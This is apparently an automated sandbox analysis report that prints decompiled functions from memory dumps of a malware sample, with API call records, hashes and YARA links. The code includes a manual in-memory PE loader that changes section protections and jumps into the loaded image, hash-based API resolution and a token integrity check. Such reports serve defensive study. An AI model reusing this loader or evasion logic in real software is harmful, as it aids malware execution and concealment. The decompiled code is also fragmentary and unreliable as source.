                                                                                                        0x6e480ec2
                                                                                                        0x6e480ed4
                                                                                                        0x6e480ed6
                                                                                                        0x6e480ed8
                                                                                                        0x6e480ee5
                                                                                                        0x6e480ee5
                                                                                                        0x6e480ef5
                                                                                                        0x6e480f06
                                                                                                        0x6e480f0b
                                                                                                        0x6e480f0d
                                                                                                        0x6e480f0f
                                                                                                        0x6e480f16
                                                                                                        0x6e480f17
                                                                                                        0x6e480f17
                                                                                                        0x6e480f23
                                                                                                        0x6e480f44
                                                                                                        0x6e480f4d
                                                                                                        0x6e480f59
                                                                                                        0x6e480f65
                                                                                                        0x6e480f6a
                                                                                                        0x6e480f6f
                                                                                                        0x6e480f75
                                                                                                        0x6e480f75
                                                                                                        0x6e480f7a
                                                                                                        0x6e480f80
                                                                                                        0x00000000
                                                                                                        0x6e480f86
                                                                                                        0x6e480f88
                                                                                                        0x00000000
                                                                                                        0x6e480f88
                                                                                                        0x6e480bca
                                                                                                        0x6e480bca
                                                                                                        0x6e480bcf
                                                                                                        0x6e480bd5
                                                                                                        0x6e480bd5
                                                                                                        0x00000000
                                                                                                        0x6e480bcf
                                                                                                        0x6e480bc4
                                                                                                        0x6e480898
                                                                                                        0x6e480808
                                                                                                        0x6e480809
                                                                                                        0x6e48080b
                                                                                                        0x6e480811
                                                                                                        0x6e480dde
                                                                                                        0x6e480de3
                                                                                                        0x6e480de5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e480deb
                                                                                                        0x6e480828
                                                                                                        0x6e48082c
                                                                                                        0x6e480831
                                                                                                        0x6e480847
                                                                                                        0x6e48085e
                                                                                                        0x6e480862
                                                                                                        0x6e480c5a
                                                                                                        0x6e480c5a
                                                                                                        0x6e480862
                                                                                                        0x6e480868
                                                                                                        0x6e480871
                                                                                                        0x6e480c69
                                                                                                        0x6e480c7a
                                                                                                        0x6e480c7f
                                                                                                        0x6e480c81
                                                                                                        0x6e480c83
                                                                                                        0x6e480db4
                                                                                                        0x6e480db8
                                                                                                        0x00000000
                                                                                                        0x6e480db8
                                                                                                        0x6e480c8f
                                                                                                        0x6e480cb4
                                                                                                        0x6e480cb6
                                                                                                        0x6e480cb8
                                                                                                        0x6e480dd0
                                                                                                        0x6e480dd5
                                                                                                        0x6e480dd7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e480dd9
                                                                                                        0x6e480cc9
                                                                                                        0x6e480cd7
                                                                                                        0x6e480cde
                                                                                                        0x6e480cdf
                                                                                                        0x6e480ce0
                                                                                                        0x6e480cf2
                                                                                                        0x6e480cf4
                                                                                                        0x6e480cf6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e480cfe
                                                                                                        0x6e480d19
                                                                                                        0x6e480d1b
                                                                                                        0x6e480d1d
                                                                                                        0x6e480dc2
                                                                                                        0x6e480dc7
                                                                                                        0x6e480dc9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e480dcb
                                                                                                        0x6e480d23
                                                                                                        0x6e480d2a
                                                                                                        0x6e480d2e
                                                                                                        0x6e480d99
                                                                                                        0x6e480d99
                                                                                                        0x6e480d9b
                                                                                                        0x6e480da2
                                                                                                        0x6e480da2
                                                                                                        0x6e480da8
                                                                                                        0x6e480da8
                                                                                                        0x6e480daa
                                                                                                        0x6e480daf
                                                                                                        0x6e480daf
                                                                                                        0x00000000
                                                                                                        0x6e480daa
                                                                                                        0x6e480d9d
                                                                                                        0x6e480da0
                                                                                                        0x6e480da6
                                                                                                        0x6e480da6
                                                                                                        0x00000000
                                                                                                        0x6e480da6
                                                                                                        0x00000000
                                                                                                        0x6e480da0
                                                                                                        0x6e480d30
                                                                                                        0x6e480d30
                                                                                                        0x6e480d32
                                                                                                        0x6e480d3e
                                                                                                        0x6e480d43
                                                                                                        0x6e480d45
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e480d47
                                                                                                        0x6e480d4b
                                                                                                        0x6e480d52
                                                                                                        0x6e480d53
                                                                                                        0x6e480d54
                                                                                                        0x6e480d56
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e480d58
                                                                                                        0x6e480d5a
                                                                                                        0x6e480d61
                                                                                                        0x6e480d61
                                                                                                        0x6e480d67
                                                                                                        0x6e480d67
                                                                                                        0x6e480d69
                                                                                                        0x6e480d6e
                                                                                                        0x6e480d6e
                                                                                                        0x6e480d77
                                                                                                        0x6e480d7c
                                                                                                        0x6e480d81
                                                                                                        0x6e480d87
                                                                                                        0x6e480d87
                                                                                                        0x6e480d8c
                                                                                                        0x00000000
                                                                                                        0x6e480d8c
                                                                                                        0x6e480d5c
                                                                                                        0x6e480d5f
                                                                                                        0x6e480d65
                                                                                                        0x6e480d65
                                                                                                        0x00000000
                                                                                                        0x6e480d65
                                                                                                        0x00000000
                                                                                                        0x6e480d93
                                                                                                        0x6e480d93
                                                                                                        0x6e480d94
                                                                                                        0x6e480d94
                                                                                                        0x00000000
                                                                                                        0x6e480d32
                                                                                                        0x6e480877
                                                                                                        0x6e48087c
                                                                                                        0x6e480882
                                                                                                        0x6e480882
                                                                                                        0x00000000
                                                                                                        0x6e480c59
                                                                                                        0x6e480c59
                                                                                                        0x6e480c59

                                                                                                        APIs
                                                                                                        • GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,150C05FC,150C05FC), ref: 6E48085E
                                                                                                        • GetSystemInfo.KERNELBASE(?,8E844D1E,8E844D1E,?,?,360D0C74,?,?,1E55AAEC,?,?,C0092A94,00000000,80000002,00000000,-000000FC), ref: 6E480C20
                                                                                                        • GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6E480CB4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InformationToken$InfoSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 298373132-0
                                                                                                        • Opcode ID: dbd192c7364e75775c04c14d4722fca99b49c6ff80d8d39bb828517c8fbc3102
                                                                                                        • Instruction ID: e5ab0c719976254b15887885fbbe1cedd3522a549fec8896961ec95858081b3f
                                                                                                        • Opcode Fuzzy Hash: dbd192c7364e75775c04c14d4722fca99b49c6ff80d8d39bb828517c8fbc3102
                                                                                                        • Instruction Fuzzy Hash: 3822E47062A3419FFB60DAB4C860FDB77A9AF92308F10891FE89457294FB70D845C792
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E482234, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 58%
                                                                                                        			E6E482234(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6E483AF8(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6E48306C(0x60a28c5c, 0x11cab064, 0x60a28c5c, 0x60a28c5c);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}









                                                                                                        0x6e482234
                                                                                                        0x6e482238
                                                                                                        0x6e482254
                                                                                                        0x6e482257
                                                                                                        0x6e48223a
                                                                                                        0x6e482249
                                                                                                        0x6e48224c
                                                                                                        0x6e48224c
                                                                                                        0x6e482267
                                                                                                        0x6e48226c
                                                                                                        0x6e482270
                                                                                                        0x6e482278
                                                                                                        0x6e482278
                                                                                                        0x6e48227c

                                                                                                        APIs
                                                                                                        • NtDelayExecution.NTDLL(00000000,00000000,60A28C5C,60A28C5C,FFFFFFFF,FFFFFFFF,6E474B17,00000000,00000000,?), ref: 6E482278
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DelayExecution
                                                                                                        • String ID:
                                                                                                        • API String ID: 1249177460-0
                                                                                                        • Opcode ID: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
                                                                                                        • Instruction ID: 4a8da1d1adec18221179668d7084648316f006394b0389d2a95f16b2c8ae1a75
                                                                                                        • Opcode Fuzzy Hash: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
                                                                                                        • Instruction Fuzzy Hash: AEE065B010E302ADE7889A789C04F6B36D8AF85710F20892EB468D7284FA70D4018365
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E482820, Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E6E482820(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6E48306C(0x60a28c5c, 0x414fdf7, 0x60a28c5c, 0x60a28c5c) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}







                                                                                                        0x6e482827
                                                                                                        0x6e482830
                                                                                                        0x6e48283e
                                                                                                        0x6e482861
                                                                                                        0x6e482861
                                                                                                        0x6e482840
                                                                                                        0x6e482857
                                                                                                        0x6e48285b
                                                                                                        0x00000000
                                                                                                        0x6e48285d
                                                                                                        0x6e48285d
                                                                                                        0x6e48285d
                                                                                                        0x6e48285b
                                                                                                        0x6e482866

                                                                                                        APIs
                                                                                                        • NtAllocateVirtualMemory.NTDLL(6E4888E6,?,00000000,000000FF,6E4888E6,6E4888E6,60A28C5C,60A28C5C,?,?,6E4888E6,00003000,00000004,000000FF), ref: 6E482857
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2167126740-0
                                                                                                        • Opcode ID: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
                                                                                                        • Instruction ID: c953e542e53e42bf41fe286511827beef94f7be868a0f6df84479d812ac2dada
                                                                                                        • Opcode Fuzzy Hash: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
                                                                                                        • Instruction Fuzzy Hash: 89E03071609342AFEB08CAA5CC14E6BB7E9EF84604F108D2EB494D6250DB70D9009725
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E483138, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 37%
                                                                                                        			E6E483138(intOrPtr* __ecx) {
				void* _t1;

				_push(E6E4834B0);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}




                                                                                                        0x6e483138
                                                                                                        0x6e48313d
                                                                                                        0x6e48313f
                                                                                                        0x6e483141

                                                                                                        APIs
                                                                                                        • RtlAddVectoredExceptionHandler.NTDLL(00000001,6E4834B0,6E483128,60A28C5C,60A28C5C,?,6E476C99,00000000), ref: 6E48313F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionHandlerVectored
                                                                                                        • String ID:
                                                                                                        • API String ID: 3310709589-0
                                                                                                        • Opcode ID: 5b3b92aa466289330c3101eabf19d5531a2f8f88c2211280c1d367237a5e8d9d
                                                                                                        • Instruction ID: 0a97d0bb33b3d4215c0aee90b7faae5f73c22fd0a0ba1184529ba16a9b529ea9
                                                                                                        • Opcode Fuzzy Hash: 5b3b92aa466289330c3101eabf19d5531a2f8f88c2211280c1d367237a5e8d9d
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 011811ED, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 230memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 42%
                                                                                                        			E011811ED(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				void* _v112;
				intOrPtr _v116;
				char* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				int _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t137;
				int _t143;
				int _t151;
				int _t155;
				int _t182;
				unsigned int _t199;
				intOrPtr _t221;
				intOrPtr _t223;
				void* _t231;
				intOrPtr _t234;
				void* _t241;
				intOrPtr _t245;
				intOrPtr _t252;
				DWORD* _t265;
				void* _t269;
				intOrPtr* _t272;
				intOrPtr* _t273;

				_t137 = _a4;
				_v44 = 0;
				_t241 =  *((intOrPtr*)(_t137 + 0x38));
				 *0x1184418 = 1;
				asm("movaps xmm0, [0x1183010]");
				asm("movups [0x1184428], xmm0");
				_v48 = _t137;
				_v52 =  *((intOrPtr*)(_t137 + 0x20));
				_v56 =  *((intOrPtr*)(_v48 + 0x1c));
				_v188 = _t241;
				_v184 =  *((intOrPtr*)(_t137 + 0x18));
				_v180 = 4;
				_v176 =  &_v44;
				_v60 =  *((intOrPtr*)(_v48 + 0xc));
				_v64 = 4;
				_v68 = _t241;
				_v72 =  &_v44;
				_t143 = VirtualProtect(__edi, __ebx, __esi, _t265); // executed
				_v76 = _t143;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x18));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v44;
				_v92 = 0;
				E01182798();
				E011817A5(_v68,  *_v48, _v52);
				E01182798( *_v48, 0, _v52);
				_t151 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t272 = _t269 - 0x8c;
				_t231 = _v68;
				_t252 =  *((intOrPtr*)(_t231 + 0x3c));
				_v96 = _t151;
				_v100 = _v68 + 0x3c;
				_v104 = _t231;
				_v108 = _t252;
				if(_t252 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v104;
				if(_v60 != 0) {
					_v148 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					_v152 = 0;
					while(1) {
						_t221 = _v148;
						_t199 =  *(_t221 + 0x24);
						_v156 = _v152;
						_v160 = _t199 >> 0x0000001e & 0x00000001;
						_v164 = _t199 >> 0x1f;
						_v188 = _v68 +  *((intOrPtr*)(_t221 + 0xc));
						_v184 =  *((intOrPtr*)(_t221 + 8));
						_v180 =  *((intOrPtr*)(0x1184418 + (_v160 << 4) + (_v164 << 3) + ((_t199 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v44;
						_v168 = _t221;
						_t182 = VirtualProtect(??, ??, ??, ??); // executed
						_t272 = _t272 - 0x10;
						_t223 = _v156 + 1;
						_v172 = _t182;
						_v148 = _v168 + 0x28;
						_v152 = _t223;
						if(_t223 == _v60) {
							goto L5;
						}
					}
				}
				L5:
				 *_t272 = _v68;
				_v116 = _v68 +  *((intOrPtr*)(_v48 + 0x14));
				_t155 = DisableThreadLibraryCalls(??);
				_t273 = _t272 - 4;
				_t234 =  *_v100;
				_v140 = _t155;
				_v136 = _t234;
				_v112 = _v68;
				if(_t234 == 0) {
					L2:
					_t245 = _v48;
					_v40 =  *((intOrPtr*)(_t245 + 0x34));
					_v36 =  *((intOrPtr*)(_t245 + 8));
					_v32 =  *((intOrPtr*)(_t245 + 0x30));
					_v28 =  *((intOrPtr*)(_t245 + 0x28));
					_v24 =  *((intOrPtr*)(_t245 + 0x50));
					_v20 = _v116;
					 *_t273 = _t245;
					_v188 = 0;
					_v184 = 0x74;
					_v120 =  &_v40;
					_v124 = 0;
					_v128 = 0x74;
					_v132 =  *((intOrPtr*)(_v112 + 0x28));
					E01182798();
					if(_v132 != 0) {
						_t272 =  *((intOrPtr*)( &_v40 + 0x10));
						goto __eax;
					}
					return 1;
				} else {
					_v112 = _v68 + (_v136 + 0x0000ffff & 0x0000ffff) + 1;
					goto L2;
				}
			}































































                                                                                                        0x011811f9
                                                                                                        0x01181207
                                                                                                        0x0118120e
                                                                                                        0x01181211
                                                                                                        0x0118121b
                                                                                                        0x01181222
                                                                                                        0x0118122c
                                                                                                        0x01181232
                                                                                                        0x0118123b
                                                                                                        0x01181244
                                                                                                        0x01181247
                                                                                                        0x0118124b
                                                                                                        0x01181253
                                                                                                        0x0118125a
                                                                                                        0x0118125d
                                                                                                        0x01181260
                                                                                                        0x01181263
                                                                                                        0x01181266
                                                                                                        0x01181280
                                                                                                        0x01181286
                                                                                                        0x01181289
                                                                                                        0x01181291
                                                                                                        0x01181295
                                                                                                        0x01181298
                                                                                                        0x0118129b
                                                                                                        0x0118129e
                                                                                                        0x011812a1
                                                                                                        0x011812bc
                                                                                                        0x011812d8
                                                                                                        0x011812fd
                                                                                                        0x011812ff
                                                                                                        0x01181308
                                                                                                        0x0118130b
                                                                                                        0x01181315
                                                                                                        0x01181318
                                                                                                        0x0118131b
                                                                                                        0x0118131e
                                                                                                        0x01181321
                                                                                                        0x01181535
                                                                                                        0x01181535
                                                                                                        0x0118143f
                                                                                                        0x01181445
                                                                                                        0x0118140d
                                                                                                        0x01181413
                                                                                                        0x0118146c
                                                                                                        0x01181472
                                                                                                        0x01181484
                                                                                                        0x01181487
                                                                                                        0x01181495
                                                                                                        0x011814a6
                                                                                                        0x011814cf
                                                                                                        0x011814d2
                                                                                                        0x011814d6
                                                                                                        0x011814da
                                                                                                        0x011814e1
                                                                                                        0x011814e7
                                                                                                        0x011814e9
                                                                                                        0x011814f2
                                                                                                        0x01181503
                                                                                                        0x01181509
                                                                                                        0x0118150f
                                                                                                        0x01181515
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0118151b
                                                                                                        0x0118146c
                                                                                                        0x011813b8
                                                                                                        0x011813c6
                                                                                                        0x011813ce
                                                                                                        0x011813d1
                                                                                                        0x011813d3
                                                                                                        0x011813d9
                                                                                                        0x011813e5
                                                                                                        0x011813eb
                                                                                                        0x011813f1
                                                                                                        0x011813f4
                                                                                                        0x0118132c
                                                                                                        0x0118133c
                                                                                                        0x01181342
                                                                                                        0x01181348
                                                                                                        0x0118134e
                                                                                                        0x01181354
                                                                                                        0x0118135a
                                                                                                        0x01181360
                                                                                                        0x01181363
                                                                                                        0x01181366
                                                                                                        0x0118136e
                                                                                                        0x01181376
                                                                                                        0x01181379
                                                                                                        0x0118137c
                                                                                                        0x0118137f
                                                                                                        0x01181382
                                                                                                        0x0118138d
                                                                                                        0x01181429
                                                                                                        0x0118142f
                                                                                                        0x0118142f
                                                                                                        0x01181466
                                                                                                        0x011813fa
                                                                                                        0x011813b0
                                                                                                        0x00000000
                                                                                                        0x011813b0

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1053741780.0000000001180000.00000040.00000001.sdmp, Offset: 01180000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID: t
                                                                                                        • API String ID: 544645111-2238339752
                                                                                                        • Opcode ID: 4bcca977b5782d8f3a42921272744f939592dfb0768d80e83b366562464b0f4e
                                                                                                        • Instruction ID: 3088112386d4651506a1a79a928957f2319f3ec6f3cd9997cd557b4ab60d726a
                                                                                                        • Opcode Fuzzy Hash: 4bcca977b5782d8f3a42921272744f939592dfb0768d80e83b366562464b0f4e
                                                                                                        • Instruction Fuzzy Hash: 73B1BDB5E04219DFDB18DF58C880A9DFBF1BF88314F1585AAD948AB351D330A982CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E485E84, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E6E485E84(void* __ecx, void* __eflags, void* _a4, char _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6E47C280(_t19) == 0) {
					_t2 =  &_a8; // 0x6e485d79
					_v12 =  *_t2;
					if(E6E483064(0x8e844d1e, 0xed3ed1cc) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6E4835F0(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}











                                                                                                        0x6e485e87
                                                                                                        0x6e485e89
                                                                                                        0x6e485e95
                                                                                                        0x6e485e9b
                                                                                                        0x6e485e9f
                                                                                                        0x6e485eb5
                                                                                                        0x6e485ed4
                                                                                                        0x6e485eb7
                                                                                                        0x6e485ec8
                                                                                                        0x6e485ecc
                                                                                                        0x6e485eec
                                                                                                        0x6e485ece
                                                                                                        0x6e485ece
                                                                                                        0x6e485ece
                                                                                                        0x6e485ecc
                                                                                                        0x6e485ed5
                                                                                                        0x6e485eda
                                                                                                        0x6e485ee3
                                                                                                        0x6e485edc
                                                                                                        0x6e485edc
                                                                                                        0x6e485ede
                                                                                                        0x6e485ede
                                                                                                        0x6e485e97
                                                                                                        0x6e485e97
                                                                                                        0x6e485e97
                                                                                                        0x6e485ee9

                                                                                                        APIs
                                                                                                        • ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,8E844D1E,ED3ED1CC,?,?,?,6E485D79,00000000,?,00000000,?), ref: 6E485EC8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileRead
                                                                                                        • String ID: y]Hn
                                                                                                        • API String ID: 2738559852-3250390203
                                                                                                        • Opcode ID: c0cf3570fa8a4b5164650021c2e4412c76cd4a4c2dd5e69b9ffce37a9129dcb0
                                                                                                        • Instruction ID: 7f1acbfe8ac494a32061fd34988c9abd59c802d1e72cdb2aad776fa08ddff95b
                                                                                                        • Opcode Fuzzy Hash: c0cf3570fa8a4b5164650021c2e4412c76cd4a4c2dd5e69b9ffce37a9129dcb0
                                                                                                        • Instruction Fuzzy Hash: 2AF0D130618307AEDB91EFB98C00EBB77D8EF49240F124D2BA896C6240EB36E405C661
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E4810A4, Relevance: 3.2, APIs: 2, Instructions: 153COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 78%
                                                                                                        			E6E4810A4(void* __ecx) {
				long _v12;
				void* _v20;
				void* _v24;
				long _v32;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				void* _v56;
				void* _v64;
				void* _v88;
				void* _v92;
				int _t33;
				signed char* _t35;
				intOrPtr* _t40;
				intOrPtr _t41;
				long* _t50;
				intOrPtr* _t59;
				intOrPtr* _t65;
				void* _t66;
				void* _t68;
				void* _t69;
				signed char* _t70;
				void* _t72;
				long* _t74;

				_t74 =  &_v32;
				_t69 = __ecx;
				_v12 = 0;
				_t59 = E6E48306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t59 != 0) {
					 *_t59(_t69, 8,  &_v12);
				}
				_t50 = _t74;
				 *_t50 = _v12;
				_t50[1] = 1;
				if(E6E47C280(_t50) != 0) {
					L6:
					if(_t74[1] != 0) {
						E6E47BB44(_t74);
					}
					return 0;
				} else {
					_t74[6] = 0;
					if(E6E48306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t74[6])); // executed
					}
					_t26 = _t74[6];
					if(_t74[6] != 0) {
						E6E47F584( &_v32, _t26);
						_t68 = E6E47F4BC( &(_t74[3]), 0);
						if(E6E48306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
							L32:
							E6E47F654( &_v32);
							goto L6;
						}
						_t33 = GetTokenInformation(_v40, 0x19, _t68, _t74[7],  &(_t74[6])); // executed
						if(_t33 == 0) {
							goto L32;
						}
						_t35 = E6E48306C(0x150c05fc, 0x92f703d0, 0x150c05fc, 0x150c05fc);
						if(_t35 == 0) {
							goto L32;
						}
						_push( *_t68);
						asm("int3");
						asm("int3");
						_t70 = _t35;
						if(_t70 == 0) {
							goto L32;
						}
						_t65 = E6E48306C(0x150c05fc, 0x18603352, 0x150c05fc, 0x150c05fc);
						if(_t65 == 0) {
							goto L32;
						}
						_t40 =  *_t65( *_t68, ( *_t70 & 0x000000ff) - 1);
						if(_t40 == 0) {
							goto L32;
						}
						_t41 =  *_t40;
						if(_t41 == 0) {
							_t72 = 1;
						} else {
							if(_t41 == 0x1000) {
								_t72 = 2;
							} else {
								if(_t41 == 0x2100) {
									_t72 = 4;
								} else {
									if(_t41 == 0x2000) {
										_t72 = 3;
									} else {
										if(_t41 == 0x3000) {
											_t72 = 5;
										} else {
											if(_t41 == 0x4000) {
												_t72 = 6;
											} else {
												_t66 = 7;
												_t72 =  ==  ? _t66 : 0;
											}
										}
									}
								}
							}
						}
						E6E47F654( &_v48);
						if(_v52 != 0) {
							E6E47BB44(_t74);
						}
						return _t72;
					}
					goto L6;
				}
			}




























                                                                                                        0x6e4810a6
                                                                                                        0x6e4810b3
                                                                                                        0x6e4810b5
                                                                                                        0x6e4810c4
                                                                                                        0x6e4810c8
                                                                                                        0x6e4810d2
                                                                                                        0x6e4810d2
                                                                                                        0x6e4810d8
                                                                                                        0x6e4810db
                                                                                                        0x6e4810dd
                                                                                                        0x6e4810e8
                                                                                                        0x6e481122
                                                                                                        0x6e481127
                                                                                                        0x6e48112c
                                                                                                        0x6e48112c
                                                                                                        0x00000000
                                                                                                        0x6e4810ea
                                                                                                        0x6e4810f4
                                                                                                        0x6e481107
                                                                                                        0x6e481118
                                                                                                        0x6e481118
                                                                                                        0x6e48111a
                                                                                                        0x6e481120
                                                                                                        0x6e48113e
                                                                                                        0x6e48114e
                                                                                                        0x6e481165
